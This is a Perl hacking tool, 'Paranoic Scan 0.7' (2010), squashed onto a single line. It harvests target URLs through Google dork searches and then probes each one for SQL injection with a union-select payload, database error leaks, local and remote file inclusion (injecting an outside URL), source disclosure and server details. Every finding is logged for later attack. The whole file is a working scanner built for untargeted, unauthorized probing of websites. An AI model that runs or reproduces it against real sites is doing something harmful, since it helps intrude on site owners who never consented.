#!usr/bin/perl#Paranoic Scan 0.7 Updated#(c)0ded by Doddy H 2010##Search in google with a dork#Scan type :##Full Source Discloure#LFI#RFI#SQL#MSSQL#Oracle#Jet Database#Find HTTP Options y Server nAME##use LWP::UserAgent;use HTML::LinkExtor;use URI::Split qw(uri_split);use IO::Socket;my $nave = LWP::UserAgent->new;$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");$nave->timeout(5);sub head {system 'cls';print qq(@@@@@ @ @@@@ @ @@ @@@ @@@ @@@ @@@@ @@@ @@@@ @ @@ @@@ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @@ @ @@@ @ @ @@@ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @@@@@ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @@ @@@ @@@ @@@@@@ @@@@ @@@@@@ @ @@@ @@@ @@@ @@@ @@@ @@@ @@@@@@ @ );}&menu;sub menu {&head;print "[a] : Scan a File\n";print "[b] : Search in google and scan the webs\n\n";print "[option] : ";chomp(my $op = <STDIN>);if ($op =~/a/ig) {print "\n[+] Wordlist : ";chomp(my $word = <STDIN>);my @paginas = repes(cortar(savewords($word)));my $option = &men;print "\n\n[+] Open File\n";scan($option,@paginas);} elsif ($op=~/b/ig) {print "\n[+] Dork : ";chomp(my $dork = <STDIN>);print "[+] Pages : ";chomp(my $pag = <STDIN>);my $option = &men;print "\n\n[+] Searching in google\n";my @paginas = &google($dork,$pag); scan($option,@paginas);}else {&menu;}}sub scan {my ($option,@webs) = @_;print "\n\n[Status] : Scanning\n";print "[Webs Count] : ".int(@webs)."\n\n\n";for(@webs) {if ($option=~/S/ig) {sql($_);} if ($option=~/L/ig) {lfi($_);}if ($option=~/R/ig) {rfi($_);}if ($option=~/F/ig) {fsd($_);}if ($option=~/M/ig) {mssql($_);}if ($option=~/J/ig) {access($_);}if ($option=~/O/ig) {oracle($_);}if ($option=~/HT/ig) {http($_);}if ($option=~/A/ig) {sql($_);mssql($_);access($_);oracle($_);lfi($_);rfi($_);fsd($_);http($_);}}}print "\n\n[Status] : Finish\n";&finish; sub toma {return $nave->get($_[0])->content;}sub savefile {open (SAVE,">>logs/".$_[0]);print SAVE $_[1]."\n";close SAVE; }sub finish {print "\n\n\n(C) Doddy Hackman 2010\n\n";<STDIN>;exit(1);}sub google {my($a,$b) = @_;for ($pages=10;$pages<=$b;$pages=$pages+10) {$code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");my @links = get_links($code);for my $l(@links) {if ($l =~/webcache.googleusercontent.com/) {push(@url,$l);}}}for(@url) {if ($_ =~/cache:(.*?):(.*?)\+/) {push(@founds,$2);}}my @founds = repes(cortar(@founds));return @founds; }sub http {my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]);my $socket = IO::Socket::INET->new(PeerAddr=>$auth, PeerPort=>"80", Proto=>"tcp"); print $socket "OPTIONS / HTTP/1.0\r\n\r\n";read $socket,$resultado,"1000"; if ($resultado=~/Server:(.*)/g) {my $server = $1;savefile("http-logs.txt","[+] Page : $auth"."\n");savefile("http-logs.txt","[+] Server : ".$server."\n");}if ($resultado=~/Allow: (.*)/g) {my $options = $1;savefile("http-logs.txt","[+] Options : ".$options."\n");}$socket->close;}sub sql {my ($pass1,$pass2) = ("+","--");my $page = shift;$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);if ($code1=~/The used SELECT statements have a different number of columns/ig) {print "[+] SQLI : $page\a\n";savefile("sql-logs.txt",$page);}}sub access {my $page = shift;$code1 = toma($page."'");if ($code1=~/Microsoft JET Database/ig or $code1=~/ODBC Microsoft Access Driver/ig) {print "[+] Jet DB : $page\a\n";savefile("jetdb-logs.txt",$page);}}sub mssql {my $page = shift;$code1 = toma($page."'");if ($code1=~/ODBC SQL Server Driver/ig) {print "[+] MSSQL : $page\a\n";savefile("mssql-logs.txt",$page);}}sub oracle {my $page = shift;$code1 = toma($page."'");if ($code1=~/Microsoft OLE DB Provider for Oracle/ig) {print "[+] Oracle : $page\a\n";savefile("oracle-logs.txt",$page);}}sub rfi {my $page = shift;$code1 = toma($page."http:/www.supertangas.com/");if ($code1=~/Los mejores TANGAS de la red/ig) { #Esto es conocimiento de verdad xDDDprint "[+] RFI : $page\a\n";savefile("rfi-logs.txt",$page);}}sub lfi {my $page = shift;$code1 = toma($page."'");if ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) {print "[+] LFI : $page\a\n";savefile("lfi-logs.txt",$page);}}sub fsd {my $page = shift;my ($scheme, $auth, $path, $query, $frag) = uri_split($page);if ($path=~/\/(.*)$/) { my $me = $1;$code1 = toma($page.$me);if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) {print "[+] Full Source Discloure : $page\a\n";savefile("fpd-logs.txt",$page);}}}sub repes {foreach $test(@_) {push @limpio,$test unless $repe{$test}++;}return @limpio;}sub savewords {open (FILE,$_[0]);@words = <FILE>;close FILE;for(@words) {push(@r,$_);} return(@r);} sub men {print "\n\n[+] Scan Type : \n\n";print "[S] : SQL\n";print "[M] : MSSQL\n";print "[J] : Jet Database\n";print "[O] : Oracle\n";print "[L] : LFI\n";print "[R] : RFI\n";print "[F] : Full Source Discloure\n";print "[HT] : HTTP Information\n";print "[A] : All\n\n";print "\n[Options] : ";chomp(my $option = <STDIN>);return $option;}sub cortar {my @nuevo;for(@_) {@tengo = split("=",$_);push(@nuevo,@tengo[0]."=");}return @nuevo;}sub get_links {$test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);return @links;sub agarrar {my ($a,%b) = @_;push(@links,values %b); }}# ¿ The End ?